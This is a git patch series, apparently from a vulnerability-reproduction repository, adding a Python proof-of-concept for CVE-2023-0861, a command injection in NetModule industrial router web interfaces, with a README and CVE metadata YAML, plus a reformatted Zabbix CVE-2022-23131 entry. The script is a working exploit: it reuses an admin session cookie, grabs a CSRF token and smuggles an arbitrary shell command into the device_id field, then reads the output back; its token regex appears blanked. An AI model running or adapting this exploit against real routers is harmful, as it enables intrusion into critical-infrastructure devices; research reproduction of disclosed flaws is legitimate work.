From dc567819a506aee9a292e2e248c7c80fbaea3082 Mon Sep 17 00:00:00 2001 From: Lisa_bo Date: Fri, 7 Apr 2023 13:57:51 +0800 Subject: [PATCH 1/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-08611?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2023/CVE-2023-0861/PoC-CVE-2023-0861.py | 31 +++++++++++++++ cve/NetModule/2023/CVE-2023-0861/README.md | 9 +++++ cve/NetModule/2023/yaml/CVE-2023-0861.yaml | 20 ++++++++++ ...E-2022-23131.yaml => CVE-2022-23131.yaml} | 38 +++++++++---------- openkylin_list.yaml | 2 + 5 files changed, 81 insertions(+), 19 deletions(-) create mode 100644 cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py create mode 100644 cve/NetModule/2023/CVE-2023-0861/README.md create mode 100644 cve/NetModule/2023/yaml/CVE-2023-0861.yaml rename cve/zabbix/2022/yaml/{CVE-2022-23131.yaml => CVE-2022-23131.yaml} (98%) diff --git a/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py new file mode 100644 index 00000000..28a9172b --- /dev/null +++ b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py @@ -0,0 +1,31 @@ +import re +import requests +import argparse +import urllib.parse + + +parser = argparse.ArgumentParser(description='CVE-2023-0861 PoC') +parser.add_argument('--url', type=str, required=True, help='URL of the vulnerable router') +parser.add_argument('--phpsessid', type=str, required=True, help='Admin\'s PHP session ID for authentication') +parser.add_argument('--payload', type=str, required=True, help='Command Injection Payload') +args = parser.parse_args() + +url = f'{args.url}/admin/gnss.php' +c = {'PHPSESSID':args.phpsessid} +response = requests.get(url,cookies=c) +csrf_token = re.search(r'', response.text).group(1) +#print(csrf_token) +data = { +'toggleAlignment': 'test', +'device_id': f'1; {args.payload} > /home/www-data/admin/img/nothing.png; 2', +'csrf-token': csrf_token, +} +#print(f'1; {urllib.parse.unquote(args.payload)} > /home/www-data/admin/img/nothing.png 2') +url = f'{args.url}/admin/gnssAutoAlign.php' + +response = requests.post(url, data=data,cookies=c) + +if response.status_code == 200: + results = requests.get(f'{args.url}/admin/img/nothing.png',cookies=c) + #print('done!') + print(results.content.decode()) \ No newline at end of file diff --git a/cve/NetModule/2023/CVE-2023-0861/README.md b/cve/NetModule/2023/CVE-2023-0861/README.md new file mode 100644 index 00000000..9024e8db --- /dev/null +++ b/cve/NetModule/2023/CVE-2023-0861/README.md @@ -0,0 +1,9 @@ +### Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers + +NetModule is an Original Equipment Manufacturer (OEM) of industrial grade routers that are commonly used in critical +infrastructure and industrial control systems. On February 24th, 2023, ONEKEY, a security research firm, released a security +advisory disclosing a vulnerability that affect 9 NetModule routers. The vulnerability were identified within the web +management interface and allow authenticated users to execute arbitrary commands with elevated privileges. +As an individual interested in IoT security and firmware analysis, I find it valuable to review the entire reproduction process of +reported vulnerabilities and In the pursuit of expanding my knowledge and skills, I took it upon myself to reproduce the +disclosed vulnerability. diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml new file mode 100644 index 00000000..f941a6ac --- /dev/null +++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml @@ -0,0 +1,20 @@ +id: CVE-2023-0861 +source: https://github.com/seifallahhomrani1/CVE-2023-0861-POC +info: + name: ONetModule NSRW是NetModule公司的一系列路由器软件。NetModule NSRW存在安全漏洞,该漏洞源于执行由未经过滤的用户输入构建的操作系统命令,经过身份验证的攻击者利用该漏洞可以执行任意命令。 + severity: HIGH + description: | + NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。 + scope-of-influence: + OpenSSL 9.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0861 + - https://avd.aliyun.com/detail?id=AVD-2023-0861 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-0861 + cwe-id: CWE-78 + cnvd-id: None + kve-id: None + tags: cve2023 \ No newline at end of file diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml similarity index 98% rename from cve/zabbix/2022/yaml/CVE-2022-23131.yaml rename to cve/zabbix/2022/yaml/CVE-2022-23131.yaml index 0eab256c..e3f384c6 100644 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml @@ -1,20 +1,20 @@ -id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 -info: - name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 - severity: critical - description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 - scope-of-influence: - Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://www.secpulse.com/archives/179601.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23131 - cwe-id: CWE-290 - cnvd-id: None - kve-id: None +id: CVE-2022-23131 +source: + https://github.com/L0ading-x/cve-2022-23131 +info: + name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 + severity: critical + description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 + scope-of-influence: + Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 + - https://www.secpulse.com/archives/179601.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23131 + cwe-id: CWE-290 + cnvd-id: None + kve-id: None tags: 前端认证绕过漏洞 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7128c8a6..5b0bd01d 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -164,6 +164,8 @@ cve: - CVE-2021-43798 Froxlor: - CVE-2023-0315 + NetModule: + - CVE-2023-0861 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee From 94c558e39173f26dcd3f2398e72390088ab1823f Mon Sep 17 00:00:00 2001 From: Lisa_bo Date: Mon, 17 Apr 2023 16:01:59 +0800 Subject: [PATCH 2/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-0861?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/NetModule/2023/yaml/CVE-2023-0861.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml index f941a6ac..47989d00 100644 --- a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml +++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml @@ -6,7 +6,7 @@ info: description: | NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。 scope-of-influence: - OpenSSL 9.1 + NSWR 4.3.0.0-4.3.0.119,4.4.0.0-4.4.0.118,4.6.0.0-4.6.0.105,4.7.0.0-4.7.0.103 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0861 - https://avd.aliyun.com/detail?id=AVD-2023-0861 @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0861 - cwe-id: CWE-78 + cwe-id: CWE-78,CWE-77 cnvd-id: None kve-id: None tags: cve2023 \ No newline at end of file -- Gitee From 281df8d0dd34f0052245c0b6f5a682a1b1ee77c7 Mon Sep 17 00:00:00 2001 From: Lisa_bo Date: Wed, 26 Apr 2023 14:11:02 +0800 Subject: [PATCH 3/3] =?UTF-8?q?=E6=8C=89=E8=A6=81=E6=B1=82=E4=BF=AE?= =?UTF-8?q?=E6=94=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/NetModule/2023/yaml/CVE-2023-0861.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml index 47989d00..7495f7ac 100644 --- a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml +++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml @@ -1,7 +1,7 @@ id: CVE-2023-0861 source: https://github.com/seifallahhomrani1/CVE-2023-0861-POC info: - name: ONetModule NSRW是NetModule公司的一系列路由器软件。NetModule NSRW存在安全漏洞,该漏洞源于执行由未经过滤的用户输入构建的操作系统命令,经过身份验证的攻击者利用该漏洞可以执行任意命令。 + name: ONetModule NSRW是NetModule公司的一系列路由器软件。 severity: HIGH description: | NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。 @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0861 - cwe-id: CWE-78,CWE-77 + cwe-id: CWE-78, CWE-77 cnvd-id: None kve-id: None tags: cve2023 \ No newline at end of file -- Gitee